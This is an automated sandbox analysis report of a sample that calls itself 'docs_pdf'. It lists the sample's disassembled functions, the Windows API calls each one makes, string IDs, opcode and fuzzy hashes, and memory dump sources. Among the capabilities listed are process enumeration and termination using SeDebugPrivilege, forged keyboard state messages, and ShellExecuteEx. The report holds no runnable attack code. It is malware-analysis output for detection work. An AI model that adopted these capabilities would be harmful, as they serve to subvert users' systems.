                                    • String ID: SysListView32
                                    • API String ID: 307300125-78025650
                                    • Opcode ID: 8bb2d7c180f12a35d2e9c682cba57c07afa1072c2205c638a7acaaa78f84245c
                                    • Instruction ID: 6f0ed668d0d832123791fb9db6d7cbece93f8077d2c431c7f133f5da449506a9
                                    • Opcode Fuzzy Hash: 8bb2d7c180f12a35d2e9c682cba57c07afa1072c2205c638a7acaaa78f84245c
                                    • Instruction Fuzzy Hash: A641A3B5A00309EFEB219F68CC85BEEB7EDEF48350F00046AF584E7192D67699849B50
                                    Function 0102EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 01013E91: CreateToolhelp32Snapshot.KERNEL32 ref: 01013EB6
                                      • Part of subcall function 01013E91: Process32FirstW.KERNEL32(00000000,?), ref: 01013EC4
                                      • Part of subcall function 01013E91: CloseHandle.KERNEL32(00000000), ref: 01013F8E
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0102ECB8
                                    • GetLastError.KERNEL32 ref: 0102ECCB
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0102ECFA
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0102ED77
                                    • GetLastError.KERNEL32(00000000), ref: 0102ED82
                                    • CloseHandle.KERNEL32(00000000), ref: 0102EDB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: d7ebfb6850be18fa05aa5bd816e17c8acd1f2238152604b91b69054c2b2336d6
                                    • Instruction ID: 244729af3364c64f2512ea43bc7ed4ec62d35c1f15720ca611220789b80f6c24
                                    • Opcode Fuzzy Hash: d7ebfb6850be18fa05aa5bd816e17c8acd1f2238152604b91b69054c2b2336d6
                                    • Instruction Fuzzy Hash: B741C1316442129FDB21EF18CC95FADB7A5AF41714F08805DF9869F2C2CBB9A804DF92
                                    Function 01013226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 010132C5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: 0bb0a7d771fd26f8f5cd3b68ead95d51816ef570460ba51b4944a9926bf5d3d7
                                    • Instruction ID: 46f4ee7e6dfb27b8d978612f0c612fc2ff2e7826d48c8d56c9eababc9ceb4032
                                    • Opcode Fuzzy Hash: 0bb0a7d771fd26f8f5cd3b68ead95d51816ef570460ba51b4944a9926bf5d3d7
                                    • Instruction Fuzzy Hash: 71112B31749357BBE7017A59DC43DEEB7DCFF09270F10006AFA80AE282D67E5A4086A5
                                    Function 01014534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0101454E
                                    • LoadStringW.USER32(00000000), ref: 01014555
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0101456B
                                    • LoadStringW.USER32(00000000), ref: 01014572
                                    • _wprintf.LIBCMT ref: 01014598
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 010145B6
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 01014593
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wprintf
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 3648134473-3128320259
                                    • Opcode ID: ef67aba8c33921f0e3001517b32feda1b592af7554e3a399749ab61a8a5e08e6
                                    • Instruction ID: 3c949541986e8f019fa35e733d313a75bc32a3f2601f6a52794b8b160c3f539d
                                    • Opcode Fuzzy Hash: ef67aba8c33921f0e3001517b32feda1b592af7554e3a399749ab61a8a5e08e6
                                    • Instruction Fuzzy Hash: 880186F2D00209BFE760A7A5DD89EFB776CE708301F000596BB85D2045EB799E858B72
                                    Function 0103D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • GetSystemMetrics.USER32(0000000F), ref: 0103D78A
                                    • GetSystemMetrics.USER32(0000000F), ref: 0103D7AA
                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0103D9E5
                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0103DA03
                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0103DA24
                                    • ShowWindow.USER32(00000003,00000000), ref: 0103DA43
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0103DA68
                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0103DA8B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                    • String ID:
                                    • API String ID: 1211466189-0
                                    • Opcode ID: b79e9dcf75fec1ca2dacd20b569b20361e00756d463a83c15085908dec9f0220
                                    • Instruction ID: 6f2b0e56bba23e2908a31370d8f1339935efdfe90d0c7d8cf734c5ed005adf09
                                    • Opcode Fuzzy Hash: b79e9dcf75fec1ca2dacd20b569b20361e00756d463a83c15085908dec9f0220
                                    • Instruction Fuzzy Hash: 15B1CC71900216EBDF14CFA9C5857BD7BFABF84701F0880AAED889B289D735A950CB50
                                    Function 00FB2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FEC417,00000004,00000000,00000000,00000000), ref: 00FB2ACF
                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FEC417,00000004,00000000,00000000,00000000,000000FF), ref: 00FB2B17
                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FEC417,00000004,00000000,00000000,00000000), ref: 00FEC46A
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FEC417,00000004,00000000,00000000,00000000), ref: 00FEC4D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 63b116614cda66bd596ee7746c84ba78e980bc65fdacc6f41b97dc9bac193c40
                                    • Instruction ID: a2f243090cae5667603f9a3cc0ccbee4e9fbf87fd6eefe35ba30b12781d80c15
                                    • Opcode Fuzzy Hash: 63b116614cda66bd596ee7746c84ba78e980bc65fdacc6f41b97dc9bac193c40
                                    • Instruction Fuzzy Hash: 37410E31E046C09AD7B5AB2BCD98BF77B99BB85320F24840DF08786594C67DA842FF51
                                    Function 01017368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0101737F
                                      • Part of subcall function 00FD0FF6: std::exception::exception.LIBCMT ref: 00FD102C
                                      • Part of subcall function 00FD0FF6: __CxxThrowException@8.LIBCMT ref: 00FD1041
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 010173B6
                                    • EnterCriticalSection.KERNEL32(?), ref: 010173D2
                                    • _memmove.LIBCMT ref: 01017420
                                    • _memmove.LIBCMT ref: 0101743D
                                    • LeaveCriticalSection.KERNEL32(?), ref: 0101744C
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 01017461
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 01017480
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 256516436-0
                                    • Opcode ID: 0e9b4fd47242c77454465a791d67e071c2c95579014e09be3562b8c8183abcac
                                    • Instruction ID: 455ba3d775b2a9fe0b5d5a36282f731fb16a23ceed677b050f1156215fdd07f7
                                    • Opcode Fuzzy Hash: 0e9b4fd47242c77454465a791d67e071c2c95579014e09be3562b8c8183abcac
                                    • Instruction Fuzzy Hash: A8318131900205EBCF10EF54DC85AAF7BB8FF45710F1441A6F944AB24ADB799A14DBA1
                                    Function 01036442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 0103645A
                                    • GetDC.USER32(00000000), ref: 01036462
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0103646D
                                    • ReleaseDC.USER32(00000000,00000000), ref: 01036479
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 010364B5
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 010364C6
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01039299,?,?,000000FF,00000000,?,000000FF,?), ref: 01036500
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01036520
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: a7c2f28201f2a87ca6746ac372048346264ca39fbde3a3126cacf3ab9e44babc
                                    • Instruction ID: 069e2fa0bfdb6d143095a06e8e24ef83b9321032bb7f802c27489a7c92371d7d
                                    • Opcode Fuzzy Hash: a7c2f28201f2a87ca6746ac372048346264ca39fbde3a3126cacf3ab9e44babc
                                    • Instruction Fuzzy Hash: CA319F72601210BFEB218F64CC8AFEA3FADEF49761F040065FE48DA195C77A9941CB61
                                    Function 0100C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: 76238957f3c9a7b5f5dd4c6b80aa9ab79382e7b6b3ce177ddec32782d24a0586
                                    • Instruction ID: 66ee51b2b8bbe1091b76471fc9190f5655f8839002a7cb7bc729546e2c5fb2a8
                                    • Opcode Fuzzy Hash: 76238957f3c9a7b5f5dd4c6b80aa9ab79382e7b6b3ce177ddec32782d24a0586
                                    • Instruction Fuzzy Hash: 002107A170020577F252E9259E82FAF37DEEF12294F0801A5FE859A3C3E765DD11C1A5
                                    Function 0101ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                      • Part of subcall function 00FCFEC6: _wcscpy.LIBCMT ref: 00FCFEE9
                                    • _wcstok.LIBCMT ref: 0101EEFF
                                    • _wcscpy.LIBCMT ref: 0101EF8E
                                    • _memset.LIBCMT ref: 0101EFC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                    • String ID: X
                                    • API String ID: 774024439-3081909835
                                    • Opcode ID: cdb3179b8913cc90c47c3b5127fcd6881cee269915e4ac82babd65523f08780f
                                    • Instruction ID: 5c57ed23f40e19ead98bf0868dc794d27303cea7f08f4060f26474206c1bf103
                                    • Opcode Fuzzy Hash: cdb3179b8913cc90c47c3b5127fcd6881cee269915e4ac82babd65523f08780f
                                    • Instruction Fuzzy Hash: 04C19D715083019FC765EF24C881A9EBBE4BF85310F04496DF9999B2A2DB78E945CF82
                                    Function 00FB1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6df62f146d2ff9ed5aefbb5afb837cce90b80ce74594034ac1fed3b946bf1683
                                    • Instruction ID: 07628c1364ec7e31280c05718571b01b1d6f42d2db7dc1a2bcf3a572211edf76
                                    • Opcode Fuzzy Hash: 6df62f146d2ff9ed5aefbb5afb837cce90b80ce74594034ac1fed3b946bf1683
                                    • Instruction Fuzzy Hash: 15716B31900109EFCB14CF99CC98AEFBB79FF86320F648149F915AA251C734AA51DFA0
                                    Function 01026E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 883cc4316777823e72a2dc9c8834f72784ffc1df8fd27a8be76824603089109a
                                    • Instruction ID: 265358342f2fad17273d3258a49df39d313b493e740aeb4bf09d998aad149153
                                    • Opcode Fuzzy Hash: 883cc4316777823e72a2dc9c8834f72784ffc1df8fd27a8be76824603089109a
                                    • Instruction Fuzzy Hash: C361FE71508311ABD720EF25CC81FAFB7E9EF94B14F00491DF68697292DB79A904CB92
                                    Function 0103B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(00B95080), ref: 0103B6A5
                                    • IsWindowEnabled.USER32(00B95080), ref: 0103B6B1
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0103B795
                                    • SendMessageW.USER32(00B95080,000000B0,?,?), ref: 0103B7CC
                                    • IsDlgButtonChecked.USER32(?,?), ref: 0103B809
                                    • GetWindowLongW.USER32(00B95080,000000EC), ref: 0103B82B
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0103B843
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                    • String ID:
                                    • API String ID: 4072528602-0
                                    • Opcode ID: 3024f94de7f14b2385dc1ea63b90905caaa6f8241801fc392c02302deaf96a15
                                    • Instruction ID: ea22c0f9bc8f00db88162c618665e0448fa353fc347545ab07e0fb7528ea69ac
                                    • Opcode Fuzzy Hash: 3024f94de7f14b2385dc1ea63b90905caaa6f8241801fc392c02302deaf96a15
                                    • Instruction Fuzzy Hash: 2A71B474A00205AFEB629F68C894FBA7BFDFF8D344F084099E9C697252C736A541DB50
                                    Function 0102F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0102F75C
                                    • _memset.LIBCMT ref: 0102F825
                                    • ShellExecuteExW.SHELL32(?), ref: 0102F86A
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                      • Part of subcall function 00FCFEC6: _wcscpy.LIBCMT ref: 00FCFEE9
                                    • GetProcessId.KERNEL32(00000000), ref: 0102F8E1
                                    • CloseHandle.KERNEL32(00000000), ref: 0102F910
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                    • String ID: @
                                    • API String ID: 3522835683-2766056989
                                    • Opcode ID: 8696de48331aaa3ab6e97c9f75f139893de64e75a0dc00b6e8040f932d2b9999
                                    • Instruction ID: 31caae60da1dd7aef51e9bd40b032c0a82f8aa22471d6819192f3e5d44ee7e9b
                                    • Opcode Fuzzy Hash: 8696de48331aaa3ab6e97c9f75f139893de64e75a0dc00b6e8040f932d2b9999
                                    • Instruction Fuzzy Hash: 7861BD75A0062ADFCB14EF65C9809AEFBF5FF48310B148459E98AAB351CB74AD40CF90
                                    Function 0101145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(?), ref: 0101149C
                                    • GetKeyboardState.USER32(?), ref: 010114B1
                                    • SetKeyboardState.USER32(?), ref: 01011512
                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 01011540
                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0101155F
                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 010115A5
                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 010115C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: e414581b9b7230eaa1d412630d8ad46092d4416026b1fcb74385def8996309f3
                                    • Instruction ID: ec0d73cda7df5bc314a19076abc1ba1c71dd10faa00b30af09410d3d6b8434ab
                                    • Opcode Fuzzy Hash: e414581b9b7230eaa1d412630d8ad46092d4416026b1fcb74385def8996309f3
                                    • Instruction Fuzzy Hash: BD51F2B0A447D67EFB3A42788805BBABEE96F06304F0C45C9E3D5468C6C6BD9884D750
                                    Function 01011276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(00000000), ref: 010112B5
                                    • GetKeyboardState.USER32(?), ref: 010112CA
                                    • SetKeyboardState.USER32(?), ref: 0101132B
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01011357
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01011374
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 010113B8
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 010113D9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 97e5c8b61fdcf43155a4b3a0477ffb45d216882c4c6288bbc6c5cd288acbe55e
                                    • Instruction ID: c145c3c41d0ce4191a9e462419dcb2f732e52105310ee4861d873b88d2998b21
